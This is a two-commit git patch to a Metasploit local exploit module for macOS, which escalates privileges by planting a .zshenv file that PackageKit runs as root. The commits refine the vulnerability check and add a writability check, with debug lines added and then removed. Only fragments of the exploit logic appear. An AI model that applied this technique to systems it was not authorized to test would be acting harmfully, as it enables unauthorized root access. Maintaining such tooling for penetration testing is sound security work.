From 1b896829c1b8e14ada057edeef887b4fdd232eb4 Mon Sep 17 00:00:00 2001 From: eipoverflow <8319262+eipoverflow@users.noreply.github.com> Date: Wed, 1 Jul 2026 13:09:05 +0200 Subject: [PATCH 1/2] Addresses comments --- .../exploits/osx/local/packagekit_zshenv_privesc.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/packagekit_zshenv_privesc.rb b/modules/exploits/osx/local/packagekit_zshenv_privesc.rb index 799555c81b319..1650ef9313903 100644 --- a/modules/exploits/osx/local/packagekit_zshenv_privesc.rb +++ b/modules/exploits/osx/local/packagekit_zshenv_privesc.rb @@ -3,6 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'pry' +require 'pry-byebug' + class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking # user interaction required @@ -81,7 +84,7 @@ def initialize(info = {}) def check version = Rex::Version.new(get_system_version) - + if version >= Rex::Version.new('14.5') CheckCode::Safe("macOS #{version} is patched (fixed in 14.5)") elsif version >= Rex::Version.new('14.0') @@ -95,6 +98,9 @@ def check elsif version >= Rex::Version.new('12.0') CheckCode::Appears("macOS #{version} is vulnerable") else + if version < Rex::Version.new("10.14") + return CheckCode::Detected("macOS #{version} detected, but zsh does not exists") unless executable?("/bin/zsh") + end CheckCode::Appears("macOS #{version} (11 and older) is vulnerable") end end @@ -106,6 +112,8 @@ def exploit home_dir = create_process('printenv', args: ['HOME']).strip fail_with(Failure::BadConfig, 'Unable to determine home directory') if home_dir.blank? zshenv_path = "#{home_dir}/.zshenv" + + fail_with(Failure::Unknown, "The .zshenv is not writable") if exist?(zshenv_path) && !writable?(zshenv_path) # Preserve original .zshenv so we can restore it after root execution original_zshenv = file?(zshenv_path) ? read_file(zshenv_path) : '' From d800565df3b982b1a3b81a5e1d5f962d323e2f53 Mon Sep 17 00:00:00 2001 From: eipoverflow <8319262+eipoverflow@users.noreply.github.com> Date: Wed, 1 Jul 2026 13:10:59 +0200 Subject: [PATCH 2/2] Removes debug stuff --- modules/exploits/osx/local/packagekit_zshenv_privesc.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/osx/local/packagekit_zshenv_privesc.rb b/modules/exploits/osx/local/packagekit_zshenv_privesc.rb index 1650ef9313903..eaf668caf858c 100644 --- a/modules/exploits/osx/local/packagekit_zshenv_privesc.rb +++ b/modules/exploits/osx/local/packagekit_zshenv_privesc.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'pry' -require 'pry-byebug' - class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking # user interaction required